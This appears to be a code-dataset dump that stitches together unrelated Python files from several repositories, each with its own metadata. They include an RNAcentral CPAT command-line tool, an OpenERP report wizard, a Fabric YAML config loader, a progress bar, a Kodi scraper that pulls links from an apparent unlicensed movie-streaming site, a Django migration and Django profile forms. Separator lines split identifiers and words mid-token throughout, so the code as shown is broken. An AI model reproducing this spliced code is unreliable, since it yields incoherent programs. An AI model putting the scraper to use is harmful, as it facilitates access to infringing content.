Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITION
|
S OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pathlib import Path
import pickle
import click
from rnacentral_pipeline.cpat import parser
|
from rnacentral_pipeline.cpat.data import CpatWriter
from rnacentral_pipeline.writers import build
@click.group("cpat")
def cli():
"""
    Commands for processing CPAT results.
"""
pass
@cli.command("parse")
@click.argument("cutoffs", type=click.File("rb"))
@click.argument("model_name")
@click.argument("results", type=click.Path())
@click.argument("output", type=click.Path())
def parse(cutoffs, model_name, results, output):
cutoffs = pickle.load(cutoffs)
data = parser.parse(cutoffs, model_name, Path(results))
with build(CpatWriter, Path(output)) as wtr:
wtr.write(data)
@cli.command("generate-cutoffs")
@click.argument("data-folder", type=click.Path())
@click.argument("output", type=click.File("wb"))
def generate_cutoffs(data_folder, output):
cutoffs = parser.cutoffs(Path(data_folder))
pickle.dump(cutoffs, output)
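# Hypothetical invocation sketch (not part of the original module), driving the
# "parse" sub-command through click's test runner; the file names below are
# assumptions chosen purely for illustration.
#
#   from click.testing import CliRunner
#   runner = CliRunner()
#   result = runner.invoke(cli, ["parse", "cutoffs.pkl", "my-model",
#                                "cpat-results", "parsed-output"])
#   assert result.exit_code == 0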
|
diogocs1/comps
|
web/addons/account/wizard/account_report_common_partner.py
|
Python
|
apache-2.0
| 1,999
| 0.004502
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class account_common_partner_report(osv.osv_memory):
_name = 'account.common.partner.report'
_description = 'Account Common Partner Report'
_inherit = "account.common.report"
_columns = {
'result_selection': fields.selection([('customer','Receivable Accounts'),
('supplier','Payable Accounts'),
|
('customer_supplier','Receivable and Payable Accounts')],
"Partner's", required=True),
}
_defaults = {
'result_selection
|
': 'customer',
}
def pre_print_report(self, cr, uid, ids, data, context=None):
if context is None:
context = {}
data['form'].update(self.read(cr, uid, ids, ['result_selection'], context=context)[0])
return data
#vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
hglattergotz/sfdeploy
|
bin/config.py
|
Python
|
mit
| 2,796
| 0.002146
|
"""
Configuration tasks
This module provides tools to load yaml configuration files.
"""
import os
from fabric.api import *
from fabric.contrib.console import confirm
from fabric.colors import red, green
try:
import yaml
except ImportError:
print(red('pyYaml module not installed. Run the following commands to install it:', bold=True))
print(green(' curl -O http://pyyaml.org/download/pyyaml/PyYAML-3.10.tar.gz'))
print(green(' tar -xzf PyYAML-3.10.tar.gz'))
print(green(' cd PyYAML-3.10'))
print(green(' python setup.py install'))
print(green(' cd ..'))
print(green(' rm -rf PyYAML-3.10.tar.gz PyYAML-3.10'))
exit(1)
def load_yaml(path):
"""
Load a yaml file located at 'path' and return the content as a dictionary.
If the yaml file does not exist an empty dictionary will be returned.
"""
if os.path.exists(path):
f = open(path)
data = yaml.load(f)
f.close()
return data
else:
# This should maybe throw an exception or something
return {}
def load_yaml_config(path, env = ''):
"""
Load an environment aware yaml configuration file into a dictionary.
If a configuration depends on the target of the deployment it is possible
to pass the name of the environment to this function (env). In such a case
the yaml configuration file must look like this:
all:
key1: defaultValue1
:
prod:
key1: prod_value1
key2: prod_value2
:
dev:
key1: dev_value1
key2: dev_value2
:
'all' is the default that will be returned if no env value is passed.
'prod' and 'dev' in the above example are the names of the environments
present in this f
|
ile.
Calling the function with 'prod' as the value for env will return the key/
value pairs from the 'all' section with the values from the 'prod' section
overriding any that might have been loaded from the all
|
section.
"""
config = load_yaml(path)
if config:
if 'all' in config:
all = config['all']
else:
return {}
if env != '':
if env in config:
all.update(config[env])
return all
else:
return {}
return config
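# Hypothetical usage sketch (not part of the original module): given a file
# "config.yml" (name assumed) containing
#
#   all:
#     key1: defaultValue1
#     key2: defaultValue2
#   prod:
#     key1: prod_value1
#
# load_yaml_config('config.yml', 'prod') would return
# {'key1': 'prod_value1', 'key2': 'defaultValue2'}, i.e. the 'all' section
# with the 'prod' values layered on top.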
def load_settings(path):
"""
Take given file path and return dictionary of any key=value pairs found.
Copy and paste from fabric project's main.py.
"""
if os.path.exists(path):
comments = lambda s: s and not s.startswith("#")
settings = filter(comments, open(path, 'r'))
return dict((k.strip(), v.strip()) for k, _, v in
[s.partition('=') for s in settings])
# Handle nonexistent or empty settings file
return {}
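# Hypothetical usage sketch (not part of the original module): for a settings
# file (path assumed) containing
#
#   # deployment settings
#   host = example.com
#   user = deploy
#
# load_settings(path) would return {'host': 'example.com', 'user': 'deploy'};
# the commented line is filtered out and whitespace around '=' is stripped.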
|
asteca/ASteCA
|
packages/update_progress.py
|
Python
|
gpl-3.0
| 553
| 0
|
import sys
def updt(total, progress, extra=""):
"""
Displays or updates a console progress bar.
Original source: https://stackoverflow.com/a/15860757/1391441
"""
barLength, status = 20, ""
progress = float(
|
progress) / float(total)
if progress >= 1.:
progress, status = 1, "\r\n"
block = int(round(barLength * progr
|
ess))
text = "\r[{}] {:.0f}% {}{}".format(
"#" * block + "-" * (barLength - block),
round(progress * 100, 0), extra, status)
sys.stdout.write(text)
sys.stdout.flush()
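# Hypothetical demo (not part of the original module); run the file directly to
# watch the bar fill over a dummy 50-step loop.
if __name__ == "__main__":
    import time

    for i in range(50):
        time.sleep(0.02)              # stand-in for real work
        updt(50, i + 1, extra="demo")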
|
repotvsupertuga/tvsupertuga.repository
|
script.module.openscrapers/lib/openscrapers/sources_openscrapers/en/coolmoviezone.py
|
Python
|
gpl-2.0
| 2,749
| 0.001091
|
# -*- coding: utf-8 -*-
# ..#######.########.#######.##....#..######..######.########....###...########.#######.########..######.
# .##.....#.##.....#.##......###...#.##....#.##....#.##.....#...##.##..##.....#.##......##.....#.##....##
# .##.....#.##.....#.##......####..#.##......##......##.....#..##...##.##.....#.##......##.....#.##......
# .##.....#.########.######..##.##.#..######.##......########.##.....#.########.######..########..######.
# .##.....#.##.......##......##..###.......#.##......##...##..########.##.......##......##...##........##
# .##.....#.##.......##......##...##.##....#.##....#.##....##.##.....#.##.......##......##....##.##....##
# ..#######.##.......#######.##....#..######..######.##.....#.##.....#.##.......#######.##.....#..######.
'''
OpenScrapers Project
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
from openscrapers.modules import cleantitle, source_utils, cfscrape
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['coolmoviezone.online']
self.base_link = 'https://coolmoviezone.online'
self.scraper = cfscrape.create_scraper()
def movie(self, imdb, title, localtitle, aliases, year):
try:
title = cleantitle.geturl(title)
url = self.base_link + '/%s-%s' % (title, year)
|
return url
except:
return
def sources(self, url, hostDict
|
, hostprDict):
try:
sources = []
r = self.scraper.get(url).content
match = re.compile('<td align="center"><strong><a href="(.+?)"').findall(r)
for url in match:
host = url.split('//')[1].replace('www.', '')
host = host.split('/')[0].split('.')[0].title()
quality = source_utils.check_sd_url(url)
sources.append({'source': host, 'quality': quality, 'language': 'en', 'url': url, 'direct': False,
'debridonly': False})
except Exception:
return
return sources
def resolve(self, url):
return url
|
gdebure/cream
|
projects/migrations/0004_project_status.py
|
Python
|
gpl-3.0
| 466
| 0
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration
|
(migrations.Migration):
dependencies = [
('projects', '0003_auto_20150618_1121'),
]
operations = [
migrations.AddField(
model_name='project',
|
name='status',
field=models.ForeignKey(default='a', to='projects.ProjectStatus'),
preserve_default=False,
),
]
|
clinton-hall/nzbToMedia
|
libs/common/babelfish/__init__.py
|
Python
|
gpl-3.0
| 761
| 0.003942
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2013 the BabelFish authors. All rights reserved.
# Use of this source c
|
ode is governed by the 3-clause BSD license
# that can be found in the LICENSE file.
#
import sys
if sys.version_info[0] >= 3:
basestr = str
else:
basestr = basestring
from .converters import (LanguageConverter, LanguageReverseConverter, LanguageEquivalenceConverter, CountryConverter,
CountryReverseConverter)
from .country import country_converters, COUNTRIES, COUNTRY_MATRIX, Country
from .excep
|
tions import Error, LanguageConvertError, LanguageReverseError, CountryConvertError, CountryReverseError
from .language import language_converters, LANGUAGES, LANGUAGE_MATRIX, Language
from .script import SCRIPTS, SCRIPT_MATRIX, Script
|
edwar/repositio.com
|
ProyectoDeGrado/forms.py
|
Python
|
mit
| 2,750
| 0.016364
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
from django import forms
from django.core.mail import send_mail
from django.template import Context
from ProyectoDeGrado.settings import MEDIA_ROOT
from apps.administrador.models import *
from django.contrib.auth.models import User
class PerfilForm(forms.ModelForm):
class Meta:
model = Perfil
fields = ['usuario', 'avatar', 'sede', 'codigo', 'carrera']
widgets = {
'usuario': forms.Select(attrs={'class':'selectpicker', 'disabled':'disabled', 'data-width':'100%', 'data-live-search':'true','data-container':'body'}),
'avatar':forms.FileInput(attrs={'class':'file'}),
'sede':forms.Select(attrs={'class':'selectpicker', 'data-width':'100%', 'data-live-search':'true','data-container':'body'}),
'codigo':forms.TextInput(attrs={'class':'form-control'}),
'carrera':forms.SelectMultiple(attrs={'class':'selectpicker', 'data-width':'100%', 'data-live-search':'true','data-container':'body'
|
,'title':'Seleccione sus carreras'})
}
def __init__(self, *args, **kwargs):
super(PerfilForm, self).__init__(*args, **kwargs)
        self.fields['sede'].empty_label = "Seleccione su sede"
def enviar(self, data):
link = "http://www.repositio.com/activate/"+data['username']+"/"+ data['activation_key']
message = "Continue con el proceso de registro por medio de este link "+link
|
send_mail(data['email_subject'], message, 'Repositio <repositio@gmail.com>', [data['username']+data['dominio']],fail_silently=False)
def save(self, data):
perfil = Perfil()
usuario = User.objects.get(username = data['username'])
perfil.usuario = usuario
perfil.activation_key=data['activation_key']
perfil.key_expires=datetime.datetime.strftime(datetime.datetime.now() + datetime.timedelta(days=2), "%Y-%m-%d %H:%M:%S")
perfil.save()
return perfil
class UserForm(forms.ModelForm):
class Meta:
model = User
fields = ['username', 'password', 'email', 'first_name', 'last_name']
widgets = {
'username': forms.TextInput(attrs={'class':'form-control'}),
'password': forms.PasswordInput(attrs={'class':'form-control'}),
'email': forms.EmailInput(attrs={'class':'form-control', 'disabled':'disabled'}),
'first_name': forms.TextInput(attrs={'class':'form-control'}),
'last_name': forms.TextInput(attrs={'class':'form-control'}),
}
def save(self, data):
usuario = User()
usuario.username = data['username']
usuario.email = data['username']+data['dominio']
usuario.save()
return usuario
|